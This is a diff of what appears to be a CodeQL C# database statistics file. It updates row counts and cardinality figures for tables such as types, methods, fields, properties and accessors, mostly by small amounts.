21320 5 @@ -8899,7 +8899,7 @@ 8 12 - 28556 + 28555 12 @@ -8909,7 +8909,7 @@ 19 44 - 23831 + 23830 44 @@ -8946,7 +8946,7 @@ 1 2 - 53097 + 53096 2 @@ -9003,11 +9003,11 @@ using_namespace_directives - 223779 + 223777 id - 223779 + 223777 namespace_id @@ -9025,7 +9025,7 @@ 1 2 - 223779 + 223777 @@ -9144,15 +9144,15 @@ using_directive_location - 223959 + 223957 id - 223959 + 223957 loc - 223846 + 223844 @@ -9166,7 +9166,7 @@ 1 2 - 223959 + 223957 @@ -9182,7 +9182,7 @@ 1 2 - 223734 + 223732 2 @@ -9197,11 +9197,11 @@ directive_ifs - 16750 + 16749 id - 16750 + 16749 branchTaken @@ -9223,7 +9223,7 @@ 1 2 - 16750 + 16749 @@ -9239,7 +9239,7 @@ 1 2 - 16750 + 16749 @@ -10065,7 +10065,7 @@ start - 16750 + 16749 @@ -10095,7 +10095,7 @@ 1 2 - 16750 + 16749 @@ -10105,11 +10105,11 @@ directive_define_symbols - 32513 + 32512 id - 32513 + 32512 name @@ -10127,7 +10127,7 @@ 1 2 - 32513 + 32512 @@ -11640,15 +11640,15 @@ preprocessor_directive_location - 79638 + 79637 id - 79638 + 79637 loc - 79638 + 79637 @@ -11662,7 +11662,7 @@ 1 2 - 79638 + 79637 @@ -11678,7 +11678,7 @@ 1 2 - 79638 + 79637 @@ -11688,11 +11688,11 @@ preprocessor_directive_compilation - 79638 + 79637 id - 79638 + 79637 compilation @@ -11710,7 +11710,7 @@ 1 2 - 79638 + 79637 @@ -11761,11 +11761,11 @@ preprocessor_directive_active - 79638 + 79637 id - 79638 + 79637 active @@ -11783,7 +11783,7 @@ 1 2 - 79638 + 79637 @@ -11814,11 +11814,11 @@ types - 11520193 + 11520085 id - 11520193 + 11520085 kind @@ -11826,7 +11826,7 @@ name - 3497046 + 3497013 @@ -11840,7 +11840,7 @@ 1 2 - 11520193 + 11520085 @@ -11856,7 +11856,7 @@ 1 2 - 11520193 + 11520085 @@ -11959,17 +11959,17 @@ 1 2 - 3141586 + 3141557 2 5 - 274812 + 274809 5 21597 - 80648 + 80647 @@ -11985,7 +11985,7 @@ 1 2 - 3468460 + 3468428 2 @@ -12000,15 +12000,15 @@ typerefs - 4815264 + 4815219 id - 4815264 + 4815219 name - 3370389 + 3370358 @@ -12022,7 +12022,7 @@ 1 2 - 4815264 + 4815219 @@ -12038,12 +12038,12 @@ 1 2 - 3128415 + 3128386 2 11806 - 241973 + 241971 @@ -12053,15 +12053,15 @@ typeref_type - 4775132 + 4775087 id - 4775132 + 4775087 typeId - 4775132 + 4775087 @@ -12075,7 +12075,7 @@ 1 2 - 4775132 + 4775087 @@ -12091,7 +12091,7 @@ 1 2 - 4775132 + 4775087 @@ -12101,11 +12101,11 @@ array_element_type - 116793 + 116792 array - 116793 + 116792 dimension @@ -12117,7 +12117,7 @@ element - 116409 + 116408 @@ -12131,7 +12131,7 @@ 1 2 - 116793 + 116792 @@ -12147,7 +12147,7 @@ 1 2 - 116793 + 116792 @@ -12163,7 +12163,7 @@ 1 2 - 116793 + 116792 @@ -12325,7 +12325,7 @@ 1 2 - 116084 + 116083 2 @@ -12346,7 +12346,7 @@ 1 2 - 116409 + 116408 @@ -12362,7 +12362,7 @@ 1 2 - 116084 + 116083 2 @@ -12473,11 +12473,11 @@ enum_underlying_type - 204056 + 204054 enum_id - 204056 + 204054 underlying_type_id @@ -12495,7 +12495,7 @@ 1 2 - 204056 + 204054 @@ -12556,15 +12556,15 @@ delegate_return_type - 1214025 + 1214014 delegate_id - 1214025 + 1214014 return_type_id - 609581 + 609575 @@ -12578,7 +12578,7 @@ 1 2 - 1214025 + 1214014 @@ -12594,12 +12594,12 @@ 1 2 - 578365 + 578359 2 2134 - 31216 + 31215 @@ -12677,15 +12677,15 @@ extend - 3912749 + 3912712 sub - 3912749 + 3912712 super - 608567 + 608561 @@ -12699,7 +12699,7 @@ 1 2 - 3912749 + 3912712 @@ -12715,12 +12715,12 @@ 1 2 - 412779 + 412775 2 3 - 97451 + 97450 3 @@ -12730,12 +12730,12 @@ 5 107 - 45654 + 45653 107 31892 - 1447 + 1446 @@ -12756,15 +12756,15 @@ implement - 12929395 + 12929274 sub - 4515705 + 4515663 super - 2758958 + 2758932 @@ -12778,32 +12778,32 @@ 1 2 - 1532610 + 1532595 2 3 - 1232578 + 1232567 3 4 - 844694 + 844686 4 6 - 367567 + 367564 6 9 - 339011 + 339008 9 32 - 199243 + 199241 @@ -12819,27 +12819,27 @@ 1 2 - 1324507 + 1324495 2 3 - 815340 + 815333 3 5 - 236392 + 236390 5 6 - 215396 + 215394 6 90747 - 167320 + 167318 @@ -12849,11 +12849,11 @@ type_location - 6161742 + 6161685 id - 6071408 + 6071351 loc @@ -12871,7 +12871,7 @@ 1 2 - 6041080 + 6041024 2 @@ -12952,15 +12952,15 @@ tuple_underlying_type - 37858 + 37857 tuple - 37858 + 37857 struct - 37858 + 37857 @@ -12974,7 +12974,7 @@ 1 2 - 37858 + 37857 @@ -12990,7 +12990,7 @@ 1 2 - 37858 + 37857 @@ -13000,7 +13000,7 @@ tuple_element - 99961 + 99960 tuple @@ -13012,7 +13012,7 @@ field - 99961 + 99960 @@ -13330,7 +13330,7 @@ 1 2 - 99961 + 99960 @@ -13346,7 +13346,7 @@ 1 2 - 99961 + 99960 @@ -13356,11 +13356,11 @@ attributes - 14554229 + 14554093 id - 14554229 + 14554093 kind @@ -13372,7 +13372,7 @@ target - 12720347 + 12720228 @@ -13386,7 +13386,7 @@ 1 2 - 14554229 + 14554093 @@ -13402,7 +13402,7 @@ 1 2 - 14554229 + 14554093 @@ -13418,7 +13418,7 @@ 1 2 - 14554229 + 14554093 @@ -13542,7 +13542,7 @@ 14 23 - 1447 + 1446 23 @@ -13552,7 +13552,7 @@ 40 86 - 1447 + 1446 88 @@ -13659,7 +13659,7 @@ 152 380 - 1447 + 1446 385 @@ -13685,12 +13685,12 @@ 1 2 - 11789749 + 11789638 2 3520 - 930598 + 930589 @@ -13706,7 +13706,7 @@ 1 2 - 12664594 + 12664475 2 @@ -13727,12 +13727,12 @@ 1 2 - 11960465 + 11960353 2 29 - 759882 + 759875 @@ -13742,11 +13742,11 @@ attribute_location - 14556089 + 14555953 id - 14554229 + 14554093 loc @@ -13764,7 +13764,7 @@ 1 2 - 14552752 + 14552616 2 @@ -13855,19 +13855,19 @@ type_mention - 2667838 + 2667808 id - 2667838 + 2667808 type_id - 76163 + 76156 parent - 2110780 + 2110766 @@ -13881,7 +13881,7 @@ 1 2 - 2667838 + 2667808 @@ -13897,7 +13897,7 @@ 1 2 - 2667838 + 2667808 @@ -13913,17 +13913,17 @@ 1 2 - 13028 + 13027 2 3 - 14823 + 14820 3 4 - 8378 + 8377 4 @@ -13938,7 +13938,7 @@ 6 7 - 5252 + 5251 7 @@ -13953,17 +13953,17 @@ 16 36 - 5803 + 5802 36 - 760 - 5714 + 758 + 5711 - 762 + 759 97094 - 360 + 362 @@ -13979,12 +13979,12 @@ 1 2 - 23361 + 23359 2 3 - 12267 + 12264 3 @@ -13994,7 +13994,7 @@ 4 5 - 6013 + 6012 5 @@ -14009,7 +14009,7 @@ 8 13 - 5964 + 5963 13 @@ -14018,13 +14018,13 @@ 30 - 609 - 5714 + 607 + 5711 - 612 - 73794 - 383 + 608 + 73798 + 385 @@ -14040,17 +14040,17 @@ 1 2 - 1801358 + 1801339 2 3 - 219426 + 219408 3 613 - 89995 + 90019 @@ -14066,12 +14066,12 @@ 1 2 - 2067454 + 2067445 2 38 - 43325 + 43320 @@ -14081,15 +14081,15 @@ type_mention_location - 2667838 + 2667808 id - 2667838 + 2667808 loc - 2358635 + 2358655 @@ -14103,7 +14103,7 @@ 1 2 - 2667838 + 2667808 @@ -14119,12 +14119,12 @@ 1 2 - 2217587 + 2217592 2 205 - 141048 + 141062 @@ -14134,11 +14134,11 @@ type_annotation - 1259639 + 1259627 id - 1259639 + 1259627 annotation @@ -14156,7 +14156,7 @@ 1 2 - 1259639 + 1259627 @@ -14551,15 +14551,15 @@ type_nullability - 44405235 + 44404820 id - 44402076 + 44401660 nullability - 28113 + 28112 @@ -14573,7 +14573,7 @@ 1 2 - 44399034 + 44398619 2 @@ -14594,7 +14594,7 @@ 1 2 - 10129 + 10128 2 @@ -14604,7 +14604,7 @@ 3 4 - 2894 + 2893 4 @@ -14644,11 +14644,11 @@ expr_flowstate - 5429110 + 5429197 id - 5429110 + 5429197 state @@ -14666,7 +14666,7 @@ 1 2 - 5429110 + 5429197 @@ -14680,13 +14680,13 @@ 12 - 223701 - 223702 + 223736 + 223737 2 - 2337771 - 2337772 + 2337938 + 2337939 2 @@ -14697,11 +14697,11 @@ type_parameters - 991372 + 991363 id - 991372 + 991363 index @@ -14709,7 +14709,7 @@ generic_id - 758317 + 758309 variance @@ -14727,7 +14727,7 @@ 1 2 - 991372 + 991363 @@ -14743,7 +14743,7 @@ 1 2 - 991372 + 991363 @@ -14759,7 +14759,7 @@ 1 2 - 991372 + 991363 @@ -14923,12 +14923,12 @@ 1 2 - 592797 + 592792 2 3 - 137258 + 137257 3 @@ -14949,12 +14949,12 @@ 1 2 - 592797 + 592792 2 3 - 137258 + 137257 3 @@ -14975,7 +14975,7 @@ 1 2 - 757135 + 757128 2 @@ -15068,11 +15068,11 @@ type_arguments - 24843956 + 24843724 id - 789924 + 789917 index @@ -15080,7 +15080,7 @@ constructed_id - 2591723 + 2591698 @@ -15094,17 +15094,17 @@ 1 2 - 216091 + 216089 2 3 - 548605 + 548600 3 8 - 25228 + 25227 @@ -15120,22 +15120,22 @@ 1 2 - 82752 + 82751 2 3 - 587919 + 587914 3 10 - 61303 + 61302 10 3477 - 57949 + 57948 @@ -15333,37 +15333,37 @@ 1 2 - 408050 + 408047 2 3 - 1236259 + 1236248 3 19 - 213081 + 213079 19 24 - 198798 + 198796 24 28 - 230194 + 230192 28 31 - 221032 + 221030 31 33 - 84306 + 84305 @@ -15379,37 +15379,37 @@ 1 2 - 403306 + 403302 2 3 - 1238582 + 1238571 3 19 - 215502 + 215500 19 24 - 198798 + 198796 24 28 - 230194 + 230192 28 31 - 221032 + 221030 31 33 - 84306 + 84305 @@ -15419,15 +15419,15 @@ constructed_generic - 5258135 + 5258085 constructed - 5258135 + 5258085 generic - 108318 + 108317 @@ -15441,7 +15441,7 @@ 1 2 - 5258135 + 5258085 @@ -15467,7 +15467,7 @@ 3 4 - 10631 + 10630 4 @@ -15497,7 +15497,7 @@ 149 19826 - 3396 + 3395 @@ -15507,15 +15507,15 @@ type_parameter_constraints - 991372 + 991363 id - 991372 + 991363 param_id - 991372 + 991363 @@ -15529,7 +15529,7 @@ 1 2 - 991372 + 991363 @@ -15545,7 +15545,7 @@ 1 2 - 991372 + 991363 @@ -15591,11 +15591,11 @@ general_type_parameter_constraints - 283258 + 283256 id - 282033 + 282031 kind @@ -15613,7 +15613,7 @@ 1 2 - 280808 + 280806 2 @@ -15664,11 +15664,11 @@ specific_type_parameter_constraints - 302127 + 302125 id - 295217 + 295214 base_id @@ -15686,7 +15686,7 @@ 1 2 - 290167 + 290165 2 @@ -15707,7 +15707,7 @@ 1 2 - 24776 + 24775 2 @@ -15747,7 +15747,7 @@ specific_type_parameter_nullability - 35626 + 35625 id @@ -16134,11 +16134,11 @@ has_modifiers - 100736682 + 100735739 id - 66663238 + 66662615 mod_id @@ -16156,17 +16156,17 @@ 1 2 - 34234237 + 34233917 2 3 - 30788810 + 30788522 3 5 - 1640190 + 1640174 @@ -16257,11 +16257,11 @@ compiler_generated - 1278339 + 1278327 id - 1278339 + 1278327 @@ -16356,19 +16356,19 @@ nested_types - 2161819 + 2161798 id - 2161819 + 2161798 declaring_type_id - 867580 + 867572 unbound_id - 1812914 + 1812897 @@ -16382,7 +16382,7 @@ 1 2 - 2161819 + 2161798 @@ -16398,7 +16398,7 @@ 1 2 - 2161819 + 2161798 @@ -16414,12 +16414,12 @@ 1 2 - 507720 + 507715 2 3 - 151344 + 151343 3 @@ -16455,27 +16455,27 @@ 1 2 - 509816 + 509812 2 3 - 152023 + 152022 3 4 - 71848 + 71847 4 6 - 65587 + 65586 6 26 - 65085 + 65084 26 @@ -16496,12 +16496,12 @@ 1 2 - 1746795 + 1746779 2 490 - 66119 + 66118 @@ -16517,7 +16517,7 @@ 1 2 - 1757397 + 1757380 2 @@ -16532,27 +16532,27 @@ properties - 6642412 + 6642350 id - 6642412 + 6642350 name - 1540642 + 1540628 declaring_type_id - 1854464 + 1854447 type_id - 737232 + 737225 unbound_id - 5942802 + 5942747 @@ -16566,7 +16566,7 @@ 1 2 - 6642412 + 6642350 @@ -16582,7 +16582,7 @@ 1 2 - 6642412 + 6642350 @@ -16598,7 +16598,7 @@ 1 2 - 6642412 + 6642350 @@ -16614,7 +16614,7 @@ 1 2 - 6642412 + 6642350 @@ -16630,27 +16630,27 @@ 1 2 - 972266 + 972257 2 3 - 248204 + 248202 3 4 - 95265 + 95264 4 8 - 124087 + 124086 8 8341 - 100817 + 100816 @@ -16666,27 +16666,27 @@ 1 2 - 972266 + 972257 2 3 - 248559 + 248556 3 4 - 95118 + 95117 4 8 - 124412 + 124411 8 4889 - 100286 + 100285 @@ -16702,12 +16702,12 @@ 1 2 - 1346951 + 1346938 2 3 - 111448 + 111447 3 @@ -16728,12 +16728,12 @@ 1 2 - 980741 + 980732 2 3 - 254051 + 254049 3 @@ -16743,12 +16743,12 @@ 4 8 - 120130 + 120129 8 7118 - 90275 + 90274 @@ -16764,37 +16764,37 @@ 1 2 - 660127 + 660121 2 3 - 435281 + 435277 3 4 - 247023 + 247021 4 5 - 156837 + 156835 5 7 - 156010 + 156008 7 14 - 142130 + 142129 14 2090 - 57053 + 57052 @@ -16810,37 +16810,37 @@ 1 2 - 762392 + 762385 2 3 - 334641 + 334637 3 4 - 247407 + 247405 4 5 - 159435 + 159434 5 7 - 155951 + 155949 7 14 - 139916 + 139914 14 2090 - 54720 + 54719 @@ -16856,27 +16856,27 @@ 1 2 - 764990 + 764983 2 3 - 530281 + 530276 3 4 - 228389 + 228387 4 5 - 122552 + 122550 5 9 - 154563 + 154561 9 @@ -16897,37 +16897,37 @@ 1 2 - 660127 + 660121 2 3 - 435281 + 435277 3 4 - 247023 + 247021 4 5 - 156837 + 156835 5 7 - 156010 + 156008 7 14 - 142130 + 142129 14 2090 - 57053 + 57052 @@ -16943,17 +16943,17 @@ 1 2 - 402738 + 402734 2 3 - 152023 + 152022 3 4 - 49375 + 49374 4 @@ -16963,7 +16963,7 @@ 7 32 - 55340 + 55339 32 @@ -16984,12 +16984,12 @@ 1 2 - 589136 + 589130 2 3 - 82449 + 82448 3 @@ -17015,12 +17015,12 @@ 1 2 - 421756 + 421752 2 3 - 145733 + 145732 3 @@ -17035,7 +17035,7 @@ 7 51 - 55399 + 55398 51 @@ -17056,12 +17056,12 @@ 1 2 - 404923 + 404920 2 3 - 154268 + 154266 3 @@ -17071,12 +17071,12 @@ 4 7 - 62575 + 62574 7 40 - 55399 + 55398 40 @@ -17097,12 +17097,12 @@ 1 2 - 5841365 + 5841310 2 1206 - 101437 + 101436 @@ -17118,7 +17118,7 @@ 1 2 - 5942802 + 5942747 @@ -17134,12 +17134,12 @@ 1 2 - 5841365 + 5841310 2 1206 - 101437 + 101436 @@ -17155,12 +17155,12 @@ 1 2 - 5921038 + 5920983 2 1206 - 21764 + 21763 @@ -17170,15 +17170,15 @@ property_location - 6657089 + 6657027 id - 6642412 + 6642350 loc - 10926 + 10955 @@ -17192,7 +17192,7 @@ 1 2 - 6631840 + 6631778 2 @@ -17213,7 +17213,7 @@ 1 5 - 885 + 915 5 @@ -17288,11 +17288,11 @@ indexers - 105719 + 105718 id - 105719 + 105718 name @@ -17300,7 +17300,7 @@ declaring_type_id - 92814 + 92813 type_id @@ -17322,7 +17322,7 @@ 1 2 - 105719 + 105718 @@ -17338,7 +17338,7 @@ 1 2 - 105719 + 105718 @@ -17354,7 +17354,7 @@ 1 2 - 105719 + 105718 @@ -17370,7 +17370,7 @@ 1 2 - 105719 + 105718 @@ -17571,7 +17571,7 @@ 1 2 - 92726 + 92725 2 @@ -17592,7 +17592,7 @@ 1 2 - 86731 + 86730 2 @@ -17696,7 +17696,7 @@ 1 2 - 14027 + 14026 2 @@ -17826,7 +17826,7 @@ 1 2 - 35968 + 35967 2 @@ -17841,11 +17841,11 @@ indexer_location - 106044 + 106043 id - 105719 + 105718 loc @@ -17863,7 +17863,7 @@ 1 2 - 105394 + 105393 2 @@ -17934,11 +17934,11 @@ accessors - 7915360 + 7915286 id - 7915360 + 7915286 kind @@ -17946,15 +17946,15 @@ name - 2102196 + 2102177 declaring_member_id - 6746921 + 6746858 unbound_id - 7039570 + 7039504 @@ -17968,7 +17968,7 @@ 1 2 - 7915360 + 7915286 @@ -17984,7 +17984,7 @@ 1 2 - 7915360 + 7915286 @@ -18000,7 +18000,7 @@ 1 2 - 7915360 + 7915286 @@ -18016,7 +18016,7 @@ 1 2 - 7915360 + 7915286 @@ -18116,27 +18116,27 @@ 1 2 - 1367179 + 1367166 2 3 - 330831 + 330828 3 5 - 191653 + 191651 5 17 - 160587 + 160586 17 3385 - 51944 + 51943 @@ -18152,7 +18152,7 @@ 1 2 - 2102196 + 2102177 @@ -18168,27 +18168,27 @@ 1 2 - 1367179 + 1367166 2 3 - 330831 + 330828 3 5 - 191653 + 191651 5 17 - 160587 + 160586 17 3385 - 51944 + 51943 @@ -18204,22 +18204,22 @@ 1 2 - 1382003 + 1381990 2 3 - 339690 + 339687 3 5 - 189616 + 189614 5 24 - 158786 + 158784 24 @@ -18240,12 +18240,12 @@ 1 2 - 5578483 + 5578431 2 3 - 1168438 + 1168427 @@ -18261,12 +18261,12 @@ 1 2 - 5578483 + 5578431 2 3 - 1168438 + 1168427 @@ -18282,12 +18282,12 @@ 1 2 - 5578483 + 5578431 2 3 - 1168438 + 1168427 @@ -18303,12 +18303,12 @@ 1 2 - 5578483 + 5578431 2 3 - 1168438 + 1168427 @@ -18324,12 +18324,12 @@ 1 2 - 6919853 + 6919788 2 1206 - 119717 + 119716 @@ -18345,7 +18345,7 @@ 1 2 - 7039570 + 7039504 @@ -18361,7 +18361,7 @@ 1 2 - 7039570 + 7039504 @@ -18377,12 +18377,12 @@ 1 2 - 6919853 + 6919788 2 1206 - 119717 + 119716 @@ -18403,15 +18403,15 @@ accessor_location - 7933078 + 7933004 id - 7915360 + 7915286 loc - 10926 + 10955 @@ -18425,7 +18425,7 @@ 1 2 - 7901923 + 7901849 2 @@ -18446,67 +18446,67 @@ 1 6 - 885 + 944 6 - 12 + 13 + 974 + + + 13 + 26 + 856 + + + 26 + 43 826 - 12 - 22 + 44 + 68 826 - 22 - 38 - 885 - - - 38 - 66 - 915 - - - 67 - 105 + 68 + 106 826 - 105 - 161 + 116 + 167 826 - 164 - 269 + 168 + 273 + 856 + + + 275 + 373 826 - 269 - 361 + 373 + 492 826 - 364 - 464 + 517 + 1154 826 - 477 - 1105 + 1167 + 2661 826 - 1105 - 2387 - 826 - - - 2455 + 2853 13984 - 797 + 708 @@ -18528,7 +18528,7 @@ declaring_type_id - 33842 + 33841 type_id @@ -18536,7 +18536,7 @@ unbound_id - 70637 + 70636 @@ -18799,7 +18799,7 @@ 3 4 - 3396 + 3395 4 @@ -18953,7 +18953,7 @@ 3 262 - 1447 + 1446 @@ -19015,7 +19015,7 @@ 3 4 - 3396 + 3395 4 @@ -19041,7 +19041,7 @@ 1 2 - 68127 + 68126 2 @@ -19062,7 +19062,7 @@ 1 2 - 70637 + 70636 @@ -19078,7 +19078,7 @@ 1 2 - 68127 + 68126 2 @@ -19207,11 +19207,11 @@ event_accessors - 160823 + 160822 id - 160823 + 160822 kind @@ -19219,7 +19219,7 @@ name - 68688 + 68687 declaring_event_id @@ -19227,7 +19227,7 @@ unbound_id - 141274 + 141273 @@ -19241,7 +19241,7 @@ 1 2 - 160823 + 160822 @@ -19257,7 +19257,7 @@ 1 2 - 160823 + 160822 @@ -19273,7 +19273,7 @@ 1 2 - 160823 + 160822 @@ -19289,7 +19289,7 @@ 1 2 - 160823 + 160822 @@ -19405,7 +19405,7 @@ 1 2 - 68688 + 68687 @@ -19557,7 +19557,7 @@ 1 2 - 136254 + 136253 2 @@ -19578,7 +19578,7 @@ 1 2 - 141274 + 141273 @@ -19594,7 +19594,7 @@ 1 2 - 141274 + 141273 @@ -19610,7 +19610,7 @@ 1 2 - 136254 + 136253 2 @@ -19625,11 +19625,11 @@ event_accessor_location - 160823 + 160822 id - 160823 + 160822 loc @@ -19647,7 +19647,7 @@ 1 2 - 160823 + 160822 @@ -19718,11 +19718,11 @@ operators - 629721 + 629715 id - 629721 + 629715 name @@ -19734,11 +19734,11 @@ declaring_type_id - 75488 + 75487 type_id - 30578 + 30577 unbound_id @@ -19756,7 +19756,7 @@ 1 2 - 629721 + 629715 @@ -19772,7 +19772,7 @@ 1 2 - 629721 + 629715 @@ -19788,7 +19788,7 @@ 1 2 - 629721 + 629715 @@ -19804,7 +19804,7 @@ 1 2 - 629721 + 629715 @@ -19820,7 +19820,7 @@ 1 2 - 629721 + 629715 @@ -20451,7 +20451,7 @@ 7 16 - 5808 + 5807 16 @@ -20560,7 +20560,7 @@ 7 16 - 5808 + 5807 16 @@ -20821,7 +20821,7 @@ 1 2 - 66686 + 66685 2 @@ -20879,7 +20879,7 @@ 1 2 - 66686 + 66685 2 @@ -20925,15 +20925,15 @@ operator_location - 1210557 + 1210545 id - 586251 + 586245 loc - 10667 + 10683 @@ -20952,12 +20952,12 @@ 2 3 - 567174 + 567169 3 7 - 15248 + 15247 @@ -20993,7 +20993,7 @@ 39 50 - 916 + 899 52 @@ -21018,7 +21018,7 @@ 79 83 - 850 + 867 85 @@ -21033,12 +21033,12 @@ 97 279 - 801 + 834 - 345 - 17300 - 65 + 664 + 17251 + 49 @@ -21048,15 +21048,15 @@ constant_value - 3875422 + 3875386 id - 3873680 + 3873643 value - 1314319 + 1314307 @@ -21070,7 +21070,7 @@ 1 2 - 3872528 + 3872492 2 @@ -21091,17 +21091,17 @@ 1 2 - 1062512 + 1062502 2 3 - 130820 + 130819 3 10 - 101821 + 101820 10 @@ -21116,27 +21116,27 @@ methods - 20454980 + 20454789 id - 20454980 + 20454789 name - 5761337 + 5761283 declaring_type_id - 4275208 + 4275168 type_id - 1360564 + 1360551 unbound_id - 16901323 + 16901165 @@ -21150,7 +21150,7 @@ 1 2 - 20454980 + 20454789 @@ -21166,7 +21166,7 @@ 1 2 - 20454980 + 20454789 @@ -21182,7 +21182,7 @@ 1 2 - 20454980 + 20454789 @@ -21198,7 +21198,7 @@ 1 2 - 20454980 + 20454789 @@ -21214,22 +21214,22 @@ 1 2 - 4128352 + 4128313 2 3 - 674804 + 674798 3 5 - 458551 + 458547 5 26 - 434749 + 434745 26 @@ -21250,22 +21250,22 @@ 1 2 - 4308282 + 4308242 2 3 - 587629 + 587624 3 6 - 515220 + 515216 6 10142 - 350203 + 350200 @@ -21281,17 +21281,17 @@ 1 2 - 5249541 + 5249492 2 7 - 440360 + 440356 7 2905 - 71434 + 71433 @@ -21307,22 +21307,22 @@ 1 2 - 4191695 + 4191656 2 3 - 694589 + 694583 3 5 - 457960 + 457956 5 8458 - 417090 + 417086 @@ -21338,42 +21338,42 @@ 1 2 - 1491562 + 1491548 2 3 - 954902 + 954893 3 4 - 425388 + 425384 4 5 - 301773 + 301770 5 6 - 243096 + 243093 6 9 - 373828 + 373824 9 18 - 328971 + 328968 18 8066 - 155685 + 155684 @@ -21389,37 +21389,37 @@ 1 2 - 1548261 + 1548246 2 3 - 987947 + 987937 3 4 - 436728 + 436724 4 5 - 342466 + 342463 5 6 - 264771 + 264769 6 10 - 361484 + 361481 10 70 - 320850 + 320847 70 @@ -21440,32 +21440,32 @@ 1 2 - 2042987 + 2042968 2 3 - 1046683 + 1046673 3 4 - 428371 + 428367 4 5 - 350735 + 350731 5 10 - 321559 + 321556 10 848 - 84871 + 84870 @@ -21481,42 +21481,42 @@ 1 2 - 1491592 + 1491578 2 3 - 954872 + 954863 3 4 - 425388 + 425384 4 5 - 301773 + 301770 5 6 - 243096 + 243093 6 9 - 373828 + 373824 9 18 - 328971 + 328968 18 8066 - 155685 + 155684 @@ -21532,32 +21532,32 @@ 1 2 - 771576 + 771569 2 3 - 224580 + 224578 3 4 - 98868 + 98867 4 7 - 120691 + 120690 7 23 - 102766 + 102765 23 192615 - 42081 + 42080 @@ -21573,22 +21573,22 @@ 1 2 - 948848 + 948839 2 3 - 179546 + 179544 3 5 - 116380 + 116379 5 27 - 102235 + 102234 27 @@ -21609,22 +21609,22 @@ 1 2 - 883290 + 883282 2 3 - 215160 + 215158 3 4 - 88798 + 88797 4 9 - 108554 + 108553 9 @@ -21645,22 +21645,22 @@ 1 2 - 774322 + 774315 2 3 - 226381 + 226379 3 4 - 99163 + 99162 4 7 - 121607 + 121605 7 @@ -21670,7 +21670,7 @@ 24 167300 - 36913 + 36912 @@ -21686,12 +21686,12 @@ 1 2 - 16368679 + 16368526 2 3017 - 532643 + 532638 @@ -21707,7 +21707,7 @@ 1 2 - 16901323 + 16901165 @@ -21723,12 +21723,12 @@ 1 2 - 16368797 + 16368644 2 3017 - 532525 + 532520 @@ -21744,12 +21744,12 @@ 1 2 - 16731877 + 16731720 2 1636 - 169446 + 169445 @@ -21759,11 +21759,11 @@ method_location - 20553553 + 20553361 id - 20454980 + 20454789 loc @@ -21781,7 +21781,7 @@ 1 2 - 20387030 + 20386839 2 @@ -21872,23 +21872,23 @@ constructors - 5991233 + 5991176 id - 5991233 + 5991176 name - 2792770 + 2792744 declaring_type_id - 4484787 + 4484745 unbound_id - 5562625 + 5562573 @@ -21902,7 +21902,7 @@ 1 2 - 5991233 + 5991176 @@ -21918,7 +21918,7 @@ 1 2 - 5991233 + 5991176 @@ -21934,7 +21934,7 @@ 1 2 - 5991233 + 5991176 @@ -21950,17 +21950,17 @@ 1 2 - 2023704 + 2023685 2 3 - 507720 + 507715 3 7 - 213388 + 213386 7 @@ -21981,17 +21981,17 @@ 1 2 - 2556289 + 2556265 2 6 - 210435 + 210433 6 11806 - 26046 + 26045 @@ -22007,17 +22007,17 @@ 1 2 - 2053914 + 2053895 2 3 - 509344 + 509339 3 10 - 211291 + 211289 10 @@ -22038,17 +22038,17 @@ 1 2 - 3341745 + 3341713 2 3 - 968752 + 968743 3 55 - 174289 + 174288 @@ -22064,7 +22064,7 @@ 1 2 - 4484787 + 4484745 @@ -22080,17 +22080,17 @@ 1 2 - 3341745 + 3341713 2 3 - 968752 + 968743 3 55 - 174289 + 174288 @@ -22106,7 +22106,7 @@ 1 2 - 5506044 + 5505993 2 @@ -22127,7 +22127,7 @@ 1 2 - 5562625 + 5562573 @@ -22143,7 +22143,7 @@ 1 2 - 5506044 + 5505993 2 @@ -22158,11 +22158,11 @@ constructor_location - 6040667 + 6040610 id - 5991233 + 5991176 loc @@ -22180,7 +22180,7 @@ 1 2 - 5971329 + 5971273 2 @@ -22534,7 +22534,7 @@ 1 2 - 6290 + 6289 2 @@ -22590,15 +22590,15 @@ overrides - 4832155 + 4832110 id - 4832155 + 4832110 base_id - 1569700 + 1569685 @@ -22612,7 +22612,7 @@ 1 2 - 4832155 + 4832110 @@ -22628,22 +22628,22 @@ 1 2 - 1071371 + 1071361 2 3 - 247171 + 247169 3 5 - 127336 + 127334 5 44 - 117738 + 117737 44 @@ -22658,15 +22658,15 @@ explicitly_implements - 1824372 + 1824355 id - 1823811 + 1823794 interface_id - 134836 + 134835 @@ -22680,7 +22680,7 @@ 1 2 - 1823250 + 1823233 2 @@ -22701,7 +22701,7 @@ 1 2 - 69072 + 69071 2 @@ -22721,12 +22721,12 @@ 6 10 - 10188 + 10187 10 35 - 10188 + 10187 35 @@ -23085,11 +23085,11 @@ fields - 14976517 + 14976377 id - 14976517 + 14976377 kind @@ -23097,19 +23097,19 @@ name - 6219416 + 6219358 declaring_type_id - 3386631 + 3386599 type_id - 2968123 + 2968095 unbound_id - 14485511 + 14485376 @@ -23123,7 +23123,7 @@ 1 2 - 14976517 + 14976377 @@ -23139,7 +23139,7 @@ 1 2 - 14976517 + 14976377 @@ -23155,7 +23155,7 @@ 1 2 - 14976517 + 14976377 @@ -23171,7 +23171,7 @@ 1 2 - 14976517 + 14976377 @@ -23187,7 +23187,7 @@ 1 2 - 14976517 + 14976377 @@ -23308,22 +23308,22 @@ 1 2 - 4898363 + 4898317 2 3 - 694826 + 694819 3 8 - 467558 + 467554 8 12308 - 158668 + 158666 @@ -23339,12 +23339,12 @@ 1 2 - 6076724 + 6076667 2 3 - 142691 + 142690 @@ -23360,22 +23360,22 @@ 1 2 - 4898363 + 4898317 2 3 - 694855 + 694849 3 8 - 467528 + 467524 8 12308 - 158668 + 158666 @@ -23391,17 +23391,17 @@ 1 2 - 5453627 + 5453576 2 3 - 467587 + 467583 3 12308 - 298200 + 298197 @@ -23417,22 +23417,22 @@ 1 2 - 4931319 + 4931273 2 3 - 696538 + 696532 3 10 - 479636 + 479631 10 12308 - 111921 + 111920 @@ -23448,42 +23448,42 @@ 1 2 - 934142 + 934133 2 3 - 866074 + 866066 3 4 - 480847 + 480842 4 5 - 296428 + 296425 5 6 - 198859 + 198857 6 8 - 247466 + 247464 8 15 - 263619 + 263617 15 6823 - 99193 + 99192 @@ -23499,12 +23499,12 @@ 1 2 - 3183076 + 3183047 2 3 - 203554 + 203552 @@ -23520,42 +23520,42 @@ 1 2 - 934142 + 934133 2 3 - 866103 + 866095 3 4 - 480817 + 480813 4 5 - 296428 + 296425 5 6 - 198859 + 198857 6 8 - 247466 + 247464 8 15 - 263619 + 263617 15 6823 - 